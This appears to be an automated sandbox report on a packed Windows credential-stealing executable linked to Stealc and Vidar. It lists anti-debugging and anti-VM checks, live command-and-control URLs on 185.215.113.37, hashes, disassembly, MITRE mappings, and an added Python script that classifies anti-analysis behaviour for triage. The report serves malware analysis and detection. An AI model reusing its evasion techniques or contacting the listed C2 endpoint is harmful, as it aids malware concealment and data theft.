                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BE68 second address: D4BE6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BED1 second address: D4BEE8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F885CC87018h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jc 00007F885CC87016h 0x00000016 pop edi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BEE8 second address: D4BF04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F885CB97CA7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50802EC second address: 50802F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50802F0 second address: 50802F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50802F6 second address: 508032D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, FF63h 0x00000007 mov edx, esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e mov bh, 39h 0x00000010 call 00007F885CC8701Ch 0x00000015 pop edx 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F885CC8701Ch 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 movsx edi, ax 0x00000025 movzx esi, bx 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7378F second address: C737A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CB97CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: AC1F4F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: CECB09 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00874910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0086DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0086E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0086ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00874570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0086F68A FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00873EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0086F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0086DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0086BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00861160 GetSystemInfo,ExitProcess
Source: file.exe, 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2091709653.0000000001193000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp
Source: file.exe, 00000000.00000002.2091709653.00000000011C3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWr
Source: file.exe, 00000000.00000002.2091709653.00000000011C3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2091709653.000000000114E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13645
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13648
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13659
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13699
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13667
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging
Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008645C0 VirtualProtect ?,00000004,00000100,00000000
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00879860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00879750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008778E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard
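The Anti-VM and Anti Debugging entries above are the artefacts a sandbox records when a protector runs its checks: FindWindow against debugger and monitor window classes, CreateFile on the SoftICE device names NTICE/SICE/SIWVID, ThreadHideFromDebugger, ProcessDebugPort queries, guard pages, BIOS and driver registry reads, and hypervisor strings. The Python below, added here and not part of the report or the sample, turns such behaviour lines into a per-technique tally and a triage verdict. The sample lines are copied from this report (link suffixes removed); the technique labels, the window-to-tool mapping (gbdyllo is deliberately left unidentified) and the verdict thresholds are this example's own assumptions.

```python
"""Map sandbox behaviour lines to anti-debug / anti-VM techniques (added example)."""
import re
from collections import Counter

# Device names the sample opens via CreateFile("\\\\.\\NTICE") etc.: SoftICE kernel debugger.
SOFTICE_DEVICES = {"NTICE", "SICE", "SIWVID"}
# Window titles / class names probed via FindWindow, mapped to the tool (assumed mapping).
ANALYSIS_WINDOWS = {
    "ollydbg": "OllyDbg",
    "procmon_window_class": "Process Monitor",
    "process monitor - sysinternals: www.sysinternals.com": "Process Monitor",
    "regmonclass": "Regmon",
    "registry monitor - sysinternals: www.sysinternals.com": "Regmon",
    "filemonclass": "Filemon",
    "file monitor - sysinternals: www.sysinternals.com": "Filemon",
}
# Registry values whose contents betray a hypervisor (BIOS strings, virtual display adapter).
VM_REGISTRY_VALUES = {"SystemBiosVersion", "VideoBiosVersion", "DriverDesc"}
VM_STRINGS = ("VBOX__", "VMwareVMware", "Hyper-V RAW")

RULES = [
    (re.compile(r"Open window title or class name: (?P<v>.+)$"), "window"),
    (re.compile(r"File opened: (?P<v>\S+)$"), "device"),
    (re.compile(r"Thread information set: HideFromDebugger"), "thread-hide"),
    (re.compile(r"Process queried: DebugPort"), "debugport"),
    (re.compile(r"Memory protected: page guard"), "guard-page"),
    (re.compile(r"Registry key queried: .* name: (?P<v>\w+)"), "registry"),
    (re.compile(r"Binary or memory string: (?P<v>.+)$"), "string"),
]


def classify(line):
    """Return (technique, detail) for one behaviour line, or None if it is not anti-analysis."""
    for rx, kind in RULES:
        m = rx.search(line)
        if not m:
            continue
        value = (m.groupdict().get("v") or "").strip()
        if kind == "window":
            return ("anti-debug:window", ANALYSIS_WINDOWS.get(value.lower(), f"unrecognised {value!r}"))
        if kind == "device":  # only the SoftICE names count; other file opens are normal I/O
            return ("anti-debug:softice-device", value.upper()) if value.upper() in SOFTICE_DEVICES else None
        if kind == "registry":
            return ("anti-vm:registry", value) if value in VM_REGISTRY_VALUES else None
        if kind == "string":
            hits = [s for s in VM_STRINGS if s in value]
            return ("anti-vm:string", hits[0]) if hits else None
        return ("anti-debug:" + kind, kind)
    return None


def summarize(lines):
    """Count techniques across a whole behaviour log; returns (Counter, list of hits)."""
    counts, hits = Counter(), []
    for line in lines:
        hit = classify(line)
        if hit:
            counts[hit[0]] += 1
            hits.append(hit)
    return counts, hits


def verdict(counts):
    """Triage rule (assumption): two or more anti-debug families plus any VM check looks like a protector."""
    debug = {k for k in counts if k.startswith("anti-debug:")}
    vm = {k for k in counts if k.startswith("anti-vm:")}
    if len(debug) >= 2 and vm:
        return "protector-style anti-analysis (debugger + VM checks)"
    if debug or vm:
        return "partial anti-analysis"
    return "none observed"


# Constructed from this report's own behaviour lines, plus one benign line that must be ignored.
SAMPLE_LOG = [
    r"Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion",
    r"Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion",
    r"Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc",
    r"Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__",
    "Binary or memory string: VMwareVMware",
    "Binary or memory string: Hyper-V RAW",
    "Thread information set: HideFromDebugger",
    "Open window title or class name: regmonclass",
    "Open window title or class name: gbdyllo",
    "Open window title or class name: process monitor - sysinternals: www.sysinternals.com",
    "Open window title or class name: procmon_window_class",
    "Open window title or class name: registry monitor - sysinternals: www.sysinternals.com",
    "Open window title or class name: ollydbg",
    "Open window title or class name: filemonclass",
    "Open window title or class name: file monitor - sysinternals: www.sysinternals.com",
    "File opened: NTICE",
    "File opened: SICE",
    "File opened: SIWVID",
    "Process queried: DebugPort",
    "Process queried: DebugPort",
    "Process queried: DebugPort",
    "Memory protected: page guard",
    "Queries volume information: C:\\ VolumeInformation",
]

if __name__ == "__main__":
    counts, hits = summarize(SAMPLE_LOG)
    for technique, detail in hits:
        print(f"{technique:28} {detail}")
    print(verdict(counts))
```

The window and device names are matched case-insensitively because the report lower-cases what the sample passed to FindWindow; on a real log feed the same rules can be pointed at any line source that carries these phrases.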

HIPS / PFW / Operating System Protection Evasion
Source: Yara match | File source: Process Memory Space: file.exe PID: 3448, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00879600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: ok=Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00877B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00877980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00877850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00877A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

Stealing of Sensitive Information
Source: Yara match | File source: 0.2.file.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2050826095.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2091709653.000000000114E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3448, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality
Source: Yara match | File source: 0.2.file.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2050826095.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2091709653.000000000114E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3448, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix (the number in parentheses after a technique is the count of behaviour signatures the report mapped to it; entries without a number are the matrix's untriggered techniques)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command and Scripting Interpreter (2); Native API (11); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Antivirus detection (submitted sample)
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Antivirus detection (URLs)
Source | Detection | Scanner | Label
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
No contacted domains info
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
URLs from memory and binary strings
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37I | file.exe, 00000000.00000002.2091709653.000000000114E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/5 | file.exe, 00000000.00000002.2091709653.00000000011A8000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.2091709653.0000000001193000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2091709653.000000000114E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpI | file.exe, 00000000.00000002.2091709653.00000000011C3000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1531601
                      Start date and time:2024-10-11 12:43:09 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 3m 3s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:2
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 80%
                      • Number of executed functions: 19
                      • Number of non-executed functions: 89
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated
                      • Exclude process from analysis (whitelisted): dllhost.exe
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: file.exe
                      No simulations
Joe Sandbox View: IP context for 185.215.113.37
Associated Sample Name | Detection | Threat Name | Context
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
nU3dGuezsg.exe | malicious | Amadey, Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/
file.exe | malicious | Stealc | 185.215.113.37/
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
No context
Joe Sandbox View: ASN context for WHOLESALECONNECTIONSNL
Associated Sample Name | Detection | Threat Name | Context
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc, Vidar | 185.215.113.37
nU3dGuezsg.exe | malicious | Amadey, Stealc | 185.215.113.103
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc, Vidar | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc, Vidar | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
No context
No context
                      No created / dropped files found
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.951280109490687
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'829'376 bytes
                      MD5:adde8b6ddcd55de3dde9f4ee627cc469
                      SHA1:880f68fbfe3320a5aa1114ce977b7ea532d1be11
                      SHA256:069c5ce1632725647ebe8ee55088da4f22f79f8d8922a72f70c35a87bbbc9764
                      SHA512:36f6678447ee2f204c8d15e1f9d568e5a47643bd60465fabb8cac43bc769474d8c44f94c73c08379fa34da45d46205984a1b602a0a5454518d97ff96ba172e86
                      SSDEEP:49152:e0Rp0/PavD8jJqF4Gg2uF09XyqrnlXgR:eKpaPavD8jcF4GFyqRXgR
                      TLSH:C88533288F6105A5CD5A44F526E3F65EC48E5CC8DAFC0B1B2BA95EBC464B30F321716B
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                      Icon Hash:00928e8e8686b000
                      Entrypoint:0xa93000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b
Entrypoint preview (instructions):
                      jmp 00007F885CB16ACAh
                      bswap eax
                      sbb eax, dword ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      jmp 00007F885CB18AC5h
                      inc ecx
                      push bx
                      dec esi
                      dec ebp
                      das
                      xor al, 36h
                      dec edi
                      bound ecx, dword ptr [ecx+4Ah]
                      dec edx
                      insd
                      push edi
                      dec eax
                      dec eax
                      jbe 00007F885CB16B32h
                      push esi
                      dec edx
                      popad
                      je 00007F885CB16B2Bh
                      push edx
                      dec esi
                      jc 00007F885CB16B3Ah
                      cmp byte ptr [ebx], dh
                      push edx
                      jns 00007F885CB16B07h
                      or eax, 49674B0Ah
                      cmp byte ptr [edi+43h], dl
                      jnc 00007F885CB16B0Dh
                      bound eax, dword ptr [ecx+30h]
                      pop edx
                      inc edi
                      push esp
                      push 43473163h
                      aaa
                      push edi
                      dec esi
                      xor ebp, dword ptr [ebx+59h]
                      push edi
                      push edx
                      pop eax
                      je 00007F885CB16B17h
                      xor dl, byte ptr [ebx+2Bh]
                      popad
                      jne 00007F885CB16B0Ch
                      dec eax
                      dec ebp
                      jo 00007F885CB16B03h
                      xor dword ptr [edi], esi
                      inc esp
                      dec edx
                      dec ebp
                      jns 00007F885CB16B10h
                      insd
                      jnc 00007F885CB16B30h
                      aaa
                      inc esp
                      inc ecx
                      inc ebx
                      xor dl, byte ptr [ecx+4Bh]
                      inc edx
                      inc esp
                      bound esi, dword ptr [ebx]
                      or eax, 63656B0Ah
                      jno 00007F885CB16B18h
                      push edx
                      insb
                      js 00007F885CB16B31h
                      outsb
                      inc ecx
                      jno 00007F885CB16B12h
                      push ebp
                      inc esi
                      pop edx
                      xor eax, dword ptr [ebx+36h]
                      push eax
                      aaa
                      imul edx, dword ptr [ebx+58h], 4Eh
                      aaa
                      inc ebx
                      jbe 00007F885CB16B0Ch
                      dec ebx
                      js 00007F885CB16B03h
                      jne 00007F885CB16AF1h
                      push esp
                      inc bp
                      outsb
                      inc edx
                      popad
                      dec ebx
                      insd
                      dec ebp
                      inc edi
                      xor dword ptr [ecx+36h], esp
                      push 0000004Bh
                      sub eax, dword ptr [ebp+33h]
                      jp 00007F885CB16B1Ch
                      dec edx
                      xor bh, byte ptr [edx+56h]
                      bound eax, dword ptr [edi+66h]
                      jbe 00007F885CB16AFAh
                      dec eax
                      or eax, 506C720Ah
                      aaa
                      xor dword ptr fs:[ebp+62h], ecx
                      arpl word ptr [esi], si
                      inc esp
                      jo 00007F885CB16B33h
                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319
Data directory | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
